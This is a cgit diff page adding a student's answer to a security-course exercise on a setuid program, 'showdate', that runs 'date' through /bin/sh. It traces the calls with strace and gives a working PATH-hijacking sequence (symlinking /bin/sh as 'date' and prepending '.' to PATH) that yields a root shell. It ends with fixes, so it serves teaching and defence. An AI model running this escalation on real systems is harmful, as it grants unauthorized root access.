aboutsummaryrefslogtreecommitdiff
path: root/CamilStaps-s4498062-Assignment-2/ex1
diff options
context:
space:
mode:
Diffstat (limited to 'CamilStaps-s4498062-Assignment-2/ex1')
-rw-r--r--CamilStaps-s4498062-Assignment-2/ex1/ex1.txt21
1 files changed, 21 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
new file mode 100644
index 0000000..28c5e20
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
@@ -0,0 +1,21 @@
+a
+ Using strace -feprocess ./showdate we see the following interesting calls:
+ execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
+ execve("/bin/date", ["date"], [/* 37 vars */])
+
+b
+ $ ln -s /bin/sh date
+ $ export PATH=.:$PATH
+ $ ./showdate
+ # id
+ uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil)
+
+c
+ - Simply don't use execve for something as simple as this.
+ - The currently used system call is:
+ execve("/bin/sh", ["sh, "-c", "date"], [/* 37 vars */])
+ This could be changed to:
+ execve("/bin/date", ...)
+ A nonprivileged user cannot change /bin/date.
+ - Drop privileges before executing execve.
+
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-04 05:38:52 +0000